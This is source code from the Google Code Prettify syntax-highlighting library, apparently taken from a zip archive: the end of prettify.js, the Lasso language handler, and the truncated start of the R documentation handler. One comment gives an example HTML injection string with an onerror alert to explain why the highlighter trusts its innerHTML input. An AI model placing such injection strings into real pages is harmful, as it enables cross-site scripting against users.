            shortcutStylePatterns.push([PR_COMMENT, /^#[^\r\n]*/, null, '#']);
          }
        }
        if (options['cStyleComments']) {
          fallthroughStylePatterns.push([PR_COMMENT, /^\/\/[^\r\n]*/, null]);
          fallthroughStylePatterns.push(
              [PR_COMMENT, /^\/\*[\s\S]*?(?:\*\/|$)/, null]);
        }
        var regexLiterals = options['regexLiterals'];
        if (regexLiterals) {
          /**
           * @const
           */
          var regexExcls = regexLiterals > 1
            ? ''  // Multiline regex literals
            : '\n\r';
          /**
           * @const
           */
          var regexAny = regexExcls ? '.' : '[\\S\\s]';
          /**
           * @const
           */
          var REGEX_LITERAL = (
              // A regular expression literal starts with a slash that is
              // not followed by * or / so that it is not confused with
              // comments.
              '/(?=[^/*' + regexExcls + '])'
              // and then contains any number of raw characters,
              + '(?:[^/\\x5B\\x5C' + regexExcls + ']'
              // escape sequences (\x5C),
              +    '|\\x5C' + regexAny
              // or non-nesting character sets (\x5B\x5D);
              +    '|\\x5B(?:[^\\x5C\\x5D' + regexExcls + ']'
              +             '|\\x5C' + regexAny + ')*(?:\\x5D|$))+'
              // finally closed by a /.
              + '/');
          fallthroughStylePatterns.push(
              ['lang-regex',
               RegExp('^' + REGEXP_PRECEDER_PATTERN + '(' + REGEX_LITERAL + ')')
               ]);
        }
    
        var types = options['types'];
        if (types) {
          fallthroughStylePatterns.push([PR_TYPE, types]);
        }
    
        var keywords = ("" + options['keywords']).replace(/^ | $/g, '');
        if (keywords.length) {
          fallthroughStylePatterns.push(
              [PR_KEYWORD,
               new RegExp('^(?:' + keywords.replace(/[\s,]+/g, '|') + ')\\b'),
               null]);
        }
    
        shortcutStylePatterns.push([PR_PLAIN,       /^\s+/, null, ' \r\n\t\xA0']);
    
        var punctuation =
          // The Bash man page says
    
          // A word is a sequence of characters considered as a single
          // unit by GRUB. Words are separated by metacharacters,
          // which are the following plus space, tab, and newline: { }
          // | & $ ; < >
          // ...
    
          // A word beginning with # causes that word and all remaining
          // characters on that line to be ignored.
    
          // which means that only a '#' after /(?:^|[{}|&$;<>\s])/ starts a
          // comment but empirically
          // $ echo {#}
          // {#}
          // $ echo \$#
          // $#
          // $ echo }#
          // }#
    
          // so /(?:^|[|&;<>\s])/ is more appropriate.
    
          // http://gcc.gnu.org/onlinedocs/gcc-2.95.3/cpp_1.html#SEC3
          // suggests that this definition is compatible with a
          // default mode that tries to use a single token definition
          // to recognize both bash/python style comments and C
          // preprocessor directives.
    
          // This definition of punctuation does not include # in the list of
          // follow-on exclusions, so # will not be broken before if preceeded
          // by a punctuation character.  We could try to exclude # after
          // [|&;<>] but that doesn't seem to cause many major problems.
          // If that does turn out to be a problem, we should change the below
          // when hc is truthy to include # in the run of punctuation characters
          // only when not followint [|&;<>].
          '^.[^\\s\\w.$@\'"`/\\\\]*';
        if (options['regexLiterals']) {
          punctuation += '(?!\s*\/)';
        }
    
        fallthroughStylePatterns.push(
            // TODO(mikesamuel): recognize non-latin letters and numerals in idents
            [PR_LITERAL,     /^@[a-z_$][a-z_$@0-9]*/i, null],
            [PR_TYPE,        /^(?:[@_]?[A-Z]+[a-z][A-Za-z_$@0-9]*|\w+_t\b)/, null],
            [PR_PLAIN,       /^[a-z_$][a-z_$@0-9]*/i, null],
            [PR_LITERAL,
             new RegExp(
                 '^(?:'
                 // A hex number
                 + '0x[a-f0-9]+'
                 // or an octal or decimal number,
                 + '|(?:\\d(?:_\\d+)*\\d*(?:\\.\\d*)?|\\.\\d\\+)'
                 // possibly in scientific notation
                 + '(?:e[+\\-]?\\d+)?'
                 + ')'
                 // with an optional modifier like UL for unsigned long
                 + '[a-z]*', 'i'),
             null, '0123456789'],
            // Don't treat escaped quotes in bash as starting strings.
            // See issue 144.
            [PR_PLAIN,       /^\\[\s\S]?/, null],
            [PR_PUNCTUATION, new RegExp(punctuation), null]);
    
        return createSimpleLexer(shortcutStylePatterns, fallthroughStylePatterns);
      }
    
      var decorateSource = sourceDecorator({
            'keywords': ALL_KEYWORDS,
            'hashComments': true,
            'cStyleComments': true,
            'multiLineStrings': true,
            'regexLiterals': true
          });
    
      /**
       * Given a DOM subtree, wraps it in a list, and puts each line into its own
       * list item.
       *
       * @param {Node} node modified in place.  Its content is pulled into an
       *     HTMLOListElement, and each line is moved into a separate list item.
       *     This requires cloning elements, so the input might not have unique
       *     IDs after numbering.
       * @param {number|null|boolean} startLineNum
       *     If truthy, coerced to an integer which is the 1-indexed line number
       *     of the first line of code.  The number of the first line will be
       *     attached to the list.
       * @param {boolean} isPreformatted true iff white-space in text nodes should
       *     be treated as significant.
       */
      function numberLines(node, startLineNum, isPreformatted) {
        var nocode = /(?:^|\s)nocode(?:\s|$)/;
        var lineBreak = /\r\n?|\n/;
      
        var document = node.ownerDocument;
      
        var li = document.createElement('li');
        while (node.firstChild) {
          li.appendChild(node.firstChild);
        }
        // An array of lines.  We split below, so this is initialized to one
        // un-split line.
        var listItems = [li];
      
        function walk(node) {
          var type = node.nodeType;
          if (type == 1 && !nocode.test(node.className)) {  // Element
            if ('br' === node.nodeName) {
              breakAfter(node);
              // Discard the <BR> since it is now flush against a </LI>.
              if (node.parentNode) {
                node.parentNode.removeChild(node);
              }
            } else {
              for (var child = node.firstChild; child; child = child.nextSibling) {
                walk(child);
              }
            }
          } else if ((type == 3 || type == 4) && isPreformatted) {  // Text
            var text = node.nodeValue;
            var match = text.match(lineBreak);
            if (match) {
              var firstLine = text.substring(0, match.index);
              node.nodeValue = firstLine;
              var tail = text.substring(match.index + match[0].length);
              if (tail) {
                var parent = node.parentNode;
                parent.insertBefore(
                  document.createTextNode(tail), node.nextSibling);
              }
              breakAfter(node);
              if (!firstLine) {
                // Don't leave blank text nodes in the DOM.
                node.parentNode.removeChild(node);
              }
            }
          }
        }
      
        // Split a line after the given node.
        function breakAfter(lineEndNode) {
          // If there's nothing to the right, then we can skip ending the line
          // here, and move root-wards since splitting just before an end-tag
          // would require us to create a bunch of empty copies.
          while (!lineEndNode.nextSibling) {
            lineEndNode = lineEndNode.parentNode;
            if (!lineEndNode) { return; }
          }
      
          function breakLeftOf(limit, copy) {
            // Clone shallowly if this node needs to be on both sides of the break.
            var rightSide = copy ? limit.cloneNode(false) : limit;
            var parent = limit.parentNode;
            if (parent) {
              // We clone the parent chain.
              // This helps us resurrect important styling elements that cross lines.
              // E.g. in <i>Foo<br>Bar</i>
              // should be rewritten to <li><i>Foo</i></li><li><i>Bar</i></li>.
              var parentClone = breakLeftOf(parent, 1);
              // Move the clone and everything to the right of the original
              // onto the cloned parent.
              var next = limit.nextSibling;
              parentClone.appendChild(rightSide);
              for (var sibling = next; sibling; sibling = next) {
                next = sibling.nextSibling;
                parentClone.appendChild(sibling);
              }
            }
            return rightSide;
          }
      
          var copiedListItem = breakLeftOf(lineEndNode.nextSibling, 0);
      
          // Walk the parent chain until we reach an unattached LI.
          for (var parent;
               // Check nodeType since IE invents document fragments.
               (parent = copiedListItem.parentNode) && parent.nodeType === 1;) {
            copiedListItem = parent;
          }
          // Put it on the list of lines for later processing.
          listItems.push(copiedListItem);
        }
      
        // Split lines while there are lines left to split.
        for (var i = 0;  // Number of lines that have been split so far.
             i < listItems.length;  // length updated by breakAfter calls.
             ++i) {
          walk(listItems[i]);
        }
      
        // Make sure numeric indices show correctly.
        if (startLineNum === (startLineNum|0)) {
          listItems[0].setAttribute('value', startLineNum);
        }
      
        var ol = document.createElement('ol');
        ol.className = 'linenums';
        var offset = Math.max(0, ((startLineNum - 1 /* zero index */)) | 0) || 0;
        for (var i = 0, n = listItems.length; i < n; ++i) {
          li = listItems[i];
          // Stick a class on the LIs so that stylesheets can
          // color odd/even rows, or any other row pattern that
          // is co-prime with 10.
          li.className = 'L' + ((i + offset) % 10);
          if (!li.firstChild) {
            li.appendChild(document.createTextNode('\xA0'));
          }
          ol.appendChild(li);
        }
      
        node.appendChild(ol);
      }
    
      /**
       * Breaks {@code job.sourceCode} around style boundaries in
       * {@code job.decorations} and modifies {@code job.sourceNode} in place.
       * @param {JobT} job
       * @private
       */
      function recombineTagsAndDecorations(job) {
        var isIE8OrEarlier = /\bMSIE\s(\d+)/.exec(navigator.userAgent);
        isIE8OrEarlier = isIE8OrEarlier && +isIE8OrEarlier[1] <= 8;
        var newlineRe = /\n/g;
      
        var source = job.sourceCode;
        var sourceLength = source.length;
        // Index into source after the last code-unit recombined.
        var sourceIndex = 0;
      
        var spans = job.spans;
        var nSpans = spans.length;
        // Index into spans after the last span which ends at or before sourceIndex.
        var spanIndex = 0;
      
        var decorations = job.decorations;
        var nDecorations = decorations.length;
        // Index into decorations after the last decoration which ends at or before
        // sourceIndex.
        var decorationIndex = 0;
      
        // Remove all zero-length decorations.
        decorations[nDecorations] = sourceLength;
        var decPos, i;
        for (i = decPos = 0; i < nDecorations;) {
          if (decorations[i] !== decorations[i + 2]) {
            decorations[decPos++] = decorations[i++];
            decorations[decPos++] = decorations[i++];
          } else {
            i += 2;
          }
        }
        nDecorations = decPos;
      
        // Simplify decorations.
        for (i = decPos = 0; i < nDecorations;) {
          var startPos = decorations[i];
          // Conflate all adjacent decorations that use the same style.
          var startDec = decorations[i + 1];
          var end = i + 2;
          while (end + 2 <= nDecorations && decorations[end + 1] === startDec) {
            end += 2;
          }
          decorations[decPos++] = startPos;
          decorations[decPos++] = startDec;
          i = end;
        }
      
        nDecorations = decorations.length = decPos;
      
        var sourceNode = job.sourceNode;
        var oldDisplay = "";
        if (sourceNode) {
          oldDisplay = sourceNode.style.display;
          sourceNode.style.display = 'none';
        }
        try {
          var decoration = null;
          while (spanIndex < nSpans) {
            var spanStart = spans[spanIndex];
            var spanEnd = /** @type{number} */ (spans[spanIndex + 2])
                || sourceLength;
      
            var decEnd = decorations[decorationIndex + 2] || sourceLength;
      
            var end = Math.min(spanEnd, decEnd);
      
            var textNode = /** @type{Node} */ (spans[spanIndex + 1]);
            var styledText;
            if (textNode.nodeType !== 1  // Don't muck with <BR>s or <LI>s
                // Don't introduce spans around empty text nodes.
                && (styledText = source.substring(sourceIndex, end))) {
              // This may seem bizarre, and it is.  Emitting LF on IE causes the
              // code to display with spaces instead of line breaks.
              // Emitting Windows standard issue linebreaks (CRLF) causes a blank
              // space to appear at the beginning of every line but the first.
              // Emitting an old Mac OS 9 line separator makes everything spiffy.
              if (isIE8OrEarlier) {
                styledText = styledText.replace(newlineRe, '\r');
              }
              textNode.nodeValue = styledText;
              var document = textNode.ownerDocument;
              var span = document.createElement('span');
              span.className = decorations[decorationIndex + 1];
              var parentNode = textNode.parentNode;
              parentNode.replaceChild(span, textNode);
              span.appendChild(textNode);
              if (sourceIndex < spanEnd) {  // Split off a text node.
                spans[spanIndex + 1] = textNode
                    // TODO: Possibly optimize by using '' if there's no flicker.
                    = document.createTextNode(source.substring(end, spanEnd));
                parentNode.insertBefore(textNode, span.nextSibling);
              }
            }
      
            sourceIndex = end;
      
            if (sourceIndex >= spanEnd) {
              spanIndex += 2;
            }
            if (sourceIndex >= decEnd) {
              decorationIndex += 2;
            }
          }
        } finally {
          if (sourceNode) {
            sourceNode.style.display = oldDisplay;
          }
        }
      }
    
      /** Maps language-specific file extensions to handlers. */
      var langHandlerRegistry = {};
      /** Register a language handler for the given file extensions.
        * @param {function (JobT)} handler a function from source code to a list
        *      of decorations.  Takes a single argument job which describes the
        *      state of the computation and attaches the decorations to it.
        * @param {Array.<string>} fileExtensions
        */
      function registerLangHandler(handler, fileExtensions) {
        for (var i = fileExtensions.length; --i >= 0;) {
          var ext = fileExtensions[i];
          if (!langHandlerRegistry.hasOwnProperty(ext)) {
            langHandlerRegistry[ext] = handler;
          } else if (win['console']) {
            console['warn']('cannot override language handler %s', ext);
          }
        }
      }
      function langHandlerForExtension(extension, source) {
        if (!(extension && langHandlerRegistry.hasOwnProperty(extension))) {
          // Treat it as markup if the first non whitespace character is a < and
          // the last non-whitespace character is a >.
          extension = /^\s*</.test(source)
              ? 'default-markup'
              : 'default-code';
        }
        return langHandlerRegistry[extension];
      }
      registerLangHandler(decorateSource, ['default-code']);
      registerLangHandler(
          createSimpleLexer(
              [],
              [
               [PR_PLAIN,       /^[^<?]+/],
               [PR_DECLARATION, /^<!\w[^>]*(?:>|$)/],
               [PR_COMMENT,     /^<\!--[\s\S]*?(?:-\->|$)/],
               // Unescaped content in an unknown language
               ['lang-',        /^<\?([\s\S]+?)(?:\?>|$)/],
               ['lang-',        /^<%([\s\S]+?)(?:%>|$)/],
               [PR_PUNCTUATION, /^(?:<[%?]|[%?]>)/],
               ['lang-',        /^<xmp\b[^>]*>([\s\S]+?)<\/xmp\b[^>]*>/i],
               // Unescaped content in javascript.  (Or possibly vbscript).
               ['lang-js',      /^<script\b[^>]*>([\s\S]*?)(<\/script\b[^>]*>)/i],
               // Contains unescaped stylesheet content
               ['lang-css',     /^<style\b[^>]*>([\s\S]*?)(<\/style\b[^>]*>)/i],
               ['lang-in.tag',  /^(<\/?[a-z][^<>]*>)/i]
              ]),
          ['default-markup', 'htm', 'html', 'mxml', 'xhtml', 'xml', 'xsl']);
      registerLangHandler(
          createSimpleLexer(
              [
               [PR_PLAIN,        /^[\s]+/, null, ' \t\r\n'],
               [PR_ATTRIB_VALUE, /^(?:\"[^\"]*\"?|\'[^\']*\'?)/, null, '\"\'']
               ],
              [
               [PR_TAG,          /^^<\/?[a-z](?:[\w.:-]*\w)?|\/?>$/i],
               [PR_ATTRIB_NAME,  /^(?!style[\s=]|on)[a-z](?:[\w:-]*\w)?/i],
               ['lang-uq.val',   /^=\s*([^>\'\"\s]*(?:[^>\'\"\s\/]|\/(?=\s)))/],
               [PR_PUNCTUATION,  /^[=<>\/]+/],
               ['lang-js',       /^on\w+\s*=\s*\"([^\"]+)\"/i],
               ['lang-js',       /^on\w+\s*=\s*\'([^\']+)\'/i],
               ['lang-js',       /^on\w+\s*=\s*([^\"\'>\s]+)/i],
               ['lang-css',      /^style\s*=\s*\"([^\"]+)\"/i],
               ['lang-css',      /^style\s*=\s*\'([^\']+)\'/i],
               ['lang-css',      /^style\s*=\s*([^\"\'>\s]+)/i]
               ]),
          ['in.tag']);
      registerLangHandler(
          createSimpleLexer([], [[PR_ATTRIB_VALUE, /^[\s\S]+/]]), ['uq.val']);
      registerLangHandler(sourceDecorator({
              'keywords': CPP_KEYWORDS,
              'hashComments': true,
              'cStyleComments': true,
              'types': C_TYPES
            }), ['c', 'cc', 'cpp', 'cxx', 'cyc', 'm']);
      registerLangHandler(sourceDecorator({
              'keywords': 'null,true,false'
            }), ['json']);
      registerLangHandler(sourceDecorator({
              'keywords': CSHARP_KEYWORDS,
              'hashComments': true,
              'cStyleComments': true,
              'verbatimStrings': true,
              'types': C_TYPES
            }), ['cs']);
      registerLangHandler(sourceDecorator({
              'keywords': JAVA_KEYWORDS,
              'cStyleComments': true
            }), ['java']);
      registerLangHandler(sourceDecorator({
              'keywords': SH_KEYWORDS,
              'hashComments': true,
              'multiLineStrings': true
            }), ['bash', 'bsh', 'csh', 'sh']);
      registerLangHandler(sourceDecorator({
              'keywords': PYTHON_KEYWORDS,
              'hashComments': true,
              'multiLineStrings': true,
              'tripleQuotedStrings': true
            }), ['cv', 'py', 'python']);
      registerLangHandler(sourceDecorator({
              'keywords': PERL_KEYWORDS,
              'hashComments': true,
              'multiLineStrings': true,
              'regexLiterals': 2  // multiline regex literals
            }), ['perl', 'pl', 'pm']);
      registerLangHandler(sourceDecorator({
              'keywords': RUBY_KEYWORDS,
              'hashComments': true,
              'multiLineStrings': true,
              'regexLiterals': true
            }), ['rb', 'ruby']);
      registerLangHandler(sourceDecorator({
              'keywords': JSCRIPT_KEYWORDS,
              'cStyleComments': true,
              'regexLiterals': true
            }), ['javascript', 'js']);
      registerLangHandler(sourceDecorator({
              'keywords': COFFEE_KEYWORDS,
              'hashComments': 3,  // ### style block comments
              'cStyleComments': true,
              'multilineStrings': true,
              'tripleQuotedStrings': true,
              'regexLiterals': true
            }), ['coffee']);
      registerLangHandler(
          createSimpleLexer([], [[PR_STRING, /^[\s\S]+/]]), ['regex']);
    
      /** @param {JobT} job */
      function applyDecorator(job) {
        var opt_langExtension = job.langExtension;
    
        try {
          // Extract tags, and convert the source code to plain text.
          var sourceAndSpans = extractSourceSpans(job.sourceNode, job.pre);
          /** Plain text. @type {string} */
          var source = sourceAndSpans.sourceCode;
          job.sourceCode = source;
          job.spans = sourceAndSpans.spans;
          job.basePos = 0;
    
          // Apply the appropriate language handler
          langHandlerForExtension(opt_langExtension, source)(job);
    
          // Integrate the decorations and tags back into the source code,
          // modifying the sourceNode in place.
          recombineTagsAndDecorations(job);
        } catch (e) {
          if (win['console']) {
            console['log'](e && e['stack'] || e);
          }
        }
      }
    
      /**
       * Pretty print a chunk of code.
       * @param sourceCodeHtml {string} The HTML to pretty print.
       * @param opt_langExtension {string} The language name to use.
       *     Typically, a filename extension like 'cpp' or 'java'.
       * @param opt_numberLines {number|boolean} True to number lines,
       *     or the 1-indexed number of the first line in sourceCodeHtml.
       */
      function $prettyPrintOne(sourceCodeHtml, opt_langExtension, opt_numberLines) {
        /** @type{number|boolean} */
        var nl = opt_numberLines || false;
        /** @type{string|null} */
        var langExtension = opt_langExtension || null;
        /** @type{!Element} */
        var container = document.createElement('div');
        // This could cause images to load and onload listeners to fire.
        // E.g. <img onerror="alert(1337)" src="nosuchimage.png">.
        // We assume that the inner HTML is from a trusted source.
        // The pre-tag is required for IE8 which strips newlines from innerHTML
        // when it is injected into a <pre> tag.
        // http://stackoverflow.com/questions/451486/pre-tag-loses-line-breaks-when-setting-innerhtml-in-ie
        // http://stackoverflow.com/questions/195363/inserting-a-newline-into-a-pre-tag-ie-javascript
        container.innerHTML = '<pre>' + sourceCodeHtml + '</pre>';
        container = /** @type{!Element} */(container.firstChild);
        if (nl) {
          numberLines(container, nl, true);
        }
    
        /** @type{JobT} */
        var job = {
          langExtension: langExtension,
          numberLines: nl,
          sourceNode: container,
          pre: 1,
          sourceCode: null,
          basePos: null,
          spans: null,
          decorations: null
        };
        applyDecorator(job);
        return container.innerHTML;
      }
    
       /**
        * Find all the {@code <pre>} and {@code <code>} tags in the DOM with
        * {@code class=prettyprint} and prettify them.
        *
        * @param {Function} opt_whenDone called when prettifying is done.
        * @param {HTMLElement|HTMLDocument} opt_root an element or document
        *   containing all the elements to pretty print.
        *   Defaults to {@code document.body}.
        */
      function $prettyPrint(opt_whenDone, opt_root) {
        var root = opt_root || document.body;
        var doc = root.ownerDocument || document;
        function byTagName(tn) { return root.getElementsByTagName(tn); }
        // fetch a list of nodes to rewrite
        var codeSegments = [byTagName('pre'), byTagName('code'), byTagName('xmp')];
        var elements = [];
        for (var i = 0; i < codeSegments.length; ++i) {
          for (var j = 0, n = codeSegments[i].length; j < n; ++j) {
            elements.push(codeSegments[i][j]);
          }
        }
        codeSegments = null;
    
        var clock = Date;
        if (!clock['now']) {
          clock = { 'now': function () { return +(new Date); } };
        }
    
        // The loop is broken into a series of continuations to make sure that we
        // don't make the browser unresponsive when rewriting a large page.
        var k = 0;
    
        var langExtensionRe = /\blang(?:uage)?-([\w.]+)(?!\S)/;
        var prettyPrintRe = /\bprettyprint\b/;
        var prettyPrintedRe = /\bprettyprinted\b/;
        var preformattedTagNameRe = /pre|xmp/i;
        var codeRe = /^code$/i;
        var preCodeXmpRe = /^(?:pre|code|xmp)$/i;
        var EMPTY = {};
    
        function doWork() {
          var endTime = (win['PR_SHOULD_USE_CONTINUATION'] ?
                         clock['now']() + 250 /* ms */ :
                         Infinity);
          for (; k < elements.length && clock['now']() < endTime; k++) {
            var cs = elements[k];
    
            // Look for a preceding comment like
            // <?prettify lang="..." linenums="..."?>
            var attrs = EMPTY;
            {
              for (var preceder = cs; (preceder = preceder.previousSibling);) {
                var nt = preceder.nodeType;
                // <?foo?> is parsed by HTML 5 to a comment node (8)
                // like <!--?foo?-->, but in XML is a processing instruction
                var value = (nt === 7 || nt === 8) && preceder.nodeValue;
                if (value
                    ? !/^\??prettify\b/.test(value)
                    : (nt !== 3 || /\S/.test(preceder.nodeValue))) {
                  // Skip over white-space text nodes but not others.
                  break;
                }
                if (value) {
                  attrs = {};
                  value.replace(
                      /\b(\w+)=([\w:.%+-]+)/g,
                    function (_, name, value) { attrs[name] = value; });
                  break;
                }
              }
            }
    
            var className = cs.className;
            if ((attrs !== EMPTY || prettyPrintRe.test(className))
                // Don't redo this if we've already done it.
                // This allows recalling pretty print to just prettyprint elements
                // that have been added to the page since last call.
                && !prettyPrintedRe.test(className)) {
    
              // make sure this is not nested in an already prettified element
              var nested = false;
              for (var p = cs.parentNode; p; p = p.parentNode) {
                var tn = p.tagName;
                if (preCodeXmpRe.test(tn)
                    && p.className && prettyPrintRe.test(p.className)) {
                  nested = true;
                  break;
                }
              }
              if (!nested) {
                // Mark done.  If we fail to prettyprint for whatever reason,
                // we shouldn't try again.
                cs.className += ' prettyprinted';
    
                // If the classes includes a language extensions, use it.
                // Language extensions can be specified like
                //     <pre class="prettyprint lang-cpp">
                // the language extension "cpp" is used to find a language handler
                // as passed to PR.registerLangHandler.
                // HTML5 recommends that a language be specified using "language-"
                // as the prefix instead.  Google Code Prettify supports both.
                // http://dev.w3.org/html5/spec-author-view/the-code-element.html
                var langExtension = attrs['lang'];
                if (!langExtension) {
                  langExtension = className.match(langExtensionRe);
                  // Support <pre class="prettyprint"><code class="language-c">
                  var wrapper;
                  if (!langExtension && (wrapper = childContentWrapper(cs))
                      && codeRe.test(wrapper.tagName)) {
                    langExtension = wrapper.className.match(langExtensionRe);
                  }
    
                  if (langExtension) { langExtension = langExtension[1]; }
                }
    
                var preformatted;
                if (preformattedTagNameRe.test(cs.tagName)) {
                  preformatted = 1;
                } else {
                  var currentStyle = cs['currentStyle'];
                  var defaultView = doc.defaultView;
                  var whitespace = (
                      currentStyle
                      ? currentStyle['whiteSpace']
                      : (defaultView
                         && defaultView.getComputedStyle)
                      ? defaultView.getComputedStyle(cs, null)
                      .getPropertyValue('white-space')
                      : 0);
                  preformatted = whitespace
                      && 'pre' === whitespace.substring(0, 3);
                }
    
                // Look for a class like linenums or linenums:<n> where <n> is the
                // 1-indexed number of the first line.
                var lineNums = attrs['linenums'];
                if (!(lineNums = lineNums === 'true' || +lineNums)) {
                  lineNums = className.match(/\blinenums\b(?::(\d+))?/);
                  lineNums =
                    lineNums
                    ? lineNums[1] && lineNums[1].length
                      ? +lineNums[1] : true
                    : false;
                }
                if (lineNums) { numberLines(cs, lineNums, preformatted); }
    
                // do the pretty printing
                var prettyPrintingJob = {
                  langExtension: langExtension,
                  sourceNode: cs,
                  numberLines: lineNums,
                  pre: preformatted,
                  sourceCode: null,
                  basePos: null,
                  spans: null,
                  decorations: null
                };
                applyDecorator(prettyPrintingJob);
              }
            }
          }
          if (k < elements.length) {
            // finish up in a continuation
            win.setTimeout(doWork, 250);
          } else if ('function' === typeof opt_whenDone) {
            opt_whenDone();
          }
        }
    
        doWork();
      }
    
      /**
       * Contains functions for creating and registering new language handlers.
       * @type {Object}
       */
      var PR = win['PR'] = {
            'createSimpleLexer': createSimpleLexer,
            'registerLangHandler': registerLangHandler,
            'sourceDecorator': sourceDecorator,
            'PR_ATTRIB_NAME': PR_ATTRIB_NAME,
            'PR_ATTRIB_VALUE': PR_ATTRIB_VALUE,
            'PR_COMMENT': PR_COMMENT,
            'PR_DECLARATION': PR_DECLARATION,
            'PR_KEYWORD': PR_KEYWORD,
            'PR_LITERAL': PR_LITERAL,
            'PR_NOCODE': PR_NOCODE,
            'PR_PLAIN': PR_PLAIN,
            'PR_PUNCTUATION': PR_PUNCTUATION,
            'PR_SOURCE': PR_SOURCE,
            'PR_STRING': PR_STRING,
            'PR_TAG': PR_TAG,
            'PR_TYPE': PR_TYPE,
            'prettyPrintOne':
               IN_GLOBAL_SCOPE
                 ? (win['prettyPrintOne'] = $prettyPrintOne)
                 : (prettyPrintOne = $prettyPrintOne),
            'prettyPrint': prettyPrint =
               IN_GLOBAL_SCOPE
                 ? (win['prettyPrint'] = $prettyPrint)
                 : (prettyPrint = $prettyPrint)
          };
    
      // Make PR available via the Asynchronous Module Definition (AMD) API.
      // Per https://github.com/amdjs/amdjs-api/wiki/AMD:
      // The Asynchronous Module Definition (AMD) API specifies a
      // mechanism for defining modules such that the module and its
      // dependencies can be asynchronously loaded.
      // ...
      // To allow a clear indicator that a global define function (as
      // needed for script src browser loading) conforms to the AMD API,
      // any global define function SHOULD have a property called "amd"
      // whose value is an object. This helps avoid conflict with any
      // other existing JavaScript code that could have defined a define()
      // function that does not conform to the AMD API.
      var define = win['define'];
      if (typeof define === "function" && define['amd']) {
        define("google-code-prettify", [], function () {
          return PR;
        });
      }
    })();
    return prettyPrint;
  })();

  // If this script is deferred or async and the document is already
  // loaded we need to wait for language handlers to load before performing
  // any autorun.
  function onLangsLoaded() {
    if (autorun) {
      contentLoaded(
        function () {
          var n = callbacks.length;
          var callback = n ? function () {
            for (var i = 0; i < n; ++i) {
              (function (i) {
                win.setTimeout(
                   function () {
                     win['exports'][callbacks[i]].apply(win, arguments);
                   }, 0);
               })(i);
            }
          } : void 0;
          prettyPrint(callback);
        });
    }
  }
  checkPendingLanguages();

}());
PK!�u�rr$it_sanctum/js/prettify/lang-lasso.jsnu&1i�/**
 * @license
 * Copyright (C) 2013 Eric Knibbe
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *      http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
 * @fileoverview
 * Registers a language handler for Lasso. <http://www.lassosoft.com>
 *
 * To use, include prettify.js and this file in your HTML page.
 * Then enclose your code in an HTML tag like so:
 *      <pre class="prettyprint lang-lasso">[your Lasso code]</pre>
 *
 * @author Eric Knibbe
 */

PR['registerLangHandler'](
    PR['createSimpleLexer'](
        [
          // whitespace
          [PR['PR_PLAIN'],        /^[\t\n\r \xA0]+/, null, '\t\n\r \xA0'],
          // single quote strings
          [PR['PR_STRING'],       /^\'(?:[^\'\\]|\\[\s\S])*(?:\'|$)/, null, "'"],
          // double quote strings
          [PR['PR_STRING'],       /^\"(?:[^\"\\]|\\[\s\S])*(?:\"|$)/, null, '"'],
          // ticked strings
          [PR['PR_STRING'],       /^\`[^\`]*(?:\`|$)/, null, '`'],
          // numeral as integer or hexidecimal
          [PR['PR_LITERAL'],      /^0x[\da-f]+|\d+/i, null, '0123456789'],
          // local or thread variables, or hashbang
          [PR['PR_ATTRIB_NAME'],  /^#\d+|[#$][a-z_][\w.]*|#![ \S]+lasso9\b/i, null, '#$']
        ],
        [
          // square or angle bracket delimiters
          [PR['PR_TAG'],          /^[[\]]|<\?(?:lasso(?:script)?|=)|\?>|noprocess\b|no_square_brackets\b/i],
          // single-line or block comments
          [PR['PR_COMMENT'],      /^\/\/[^\r\n]*|\/\*[\s\S]*?\*\//],
          // member variables or keyword parameters
          [PR['PR_ATTRIB_NAME'],  /^-(?!infinity)[a-z_][\w.]*|\.\s*'[a-z_][\w.]*'/i],
          // numeral as decimal or scientific notation
          [PR['PR_LITERAL'],      /^\d*\.\d+(?:e[-+]?\d+)?|infinity\b|NaN\b/i],
          // tag literals
          [PR['PR_ATTRIB_VALUE'], /^::\s*[a-z_][\w.]*/i],
          // constants
          [PR['PR_LITERAL'],      /^(?:true|false|none|minimal|full|all|void|and|or|not|bw|nbw|ew|new|cn|ncn|lt|lte|gt|gte|eq|neq|rx|nrx|ft)\b/i],
          // container or control keywords
          [PR['PR_KEYWORD'],      /^(?:error_code|error_msg|error_pop|error_push|error_reset|cache|database_names|database_schemanames|database_tablenames|define_tag|define_type|email_batch|encode_set|html_comment|handle|handle_error|header|if|inline|iterate|ljax_target|link|link_currentaction|link_currentgroup|link_currentrecord|link_detail|link_firstgroup|link_firstrecord|link_lastgroup|link_lastrecord|link_nextgroup|link_nextrecord|link_prevgroup|link_prevrecord|log|loop|namespace_using|output_none|portal|private|protect|records|referer|referrer|repeating|resultset|rows|search_args|search_arguments|select|sort_args|sort_arguments|thread_atomic|value_list|while|abort|case|else|if_empty|if_false|if_null|if_true|loop_abort|loop_continue|loop_count|params|params_up|return|return_value|run_children|soap_definetag|soap_lastrequest|soap_lastresponse|tag_name|ascending|average|by|define|descending|do|equals|frozen|group|handle_failure|import|in|into|join|let|match|max|min|on|order|parent|protected|provide|public|require|returnhome|skip|split_thread|sum|take|thread|to|trait|type|where|with|yield|yieldhome)\b/i],
          // standard type or variable declarations
          [PR['PR_TYPE'],         /^(?:array|date|decimal|duration|integer|map|pair|string|tag|xml|null|boolean|bytes|keyword|list|locale|queue|set|stack|staticarray|local|var|variable|global|data|self|inherited|currentcapture|givenblock)\b|^\.\.?/i],
          // type, method, or parameter names
          [PR['PR_PLAIN'],        /^[a-z_][\w.]*(?:=\s*(?=\())?/i],
          // operators
          [PR['PR_PUNCTUATION'],  /^:=|[-+*\/%=<>&|!?\\]/]
        ]),
    ['lasso', 'ls', 'lassoscript']);
PK!hk���!it_sanctum/js/prettify/lang-rd.jsnu&1i�/**
 * @license
 * Copyright (C) 2012 Jeffrey Arnold
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *    http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

/**
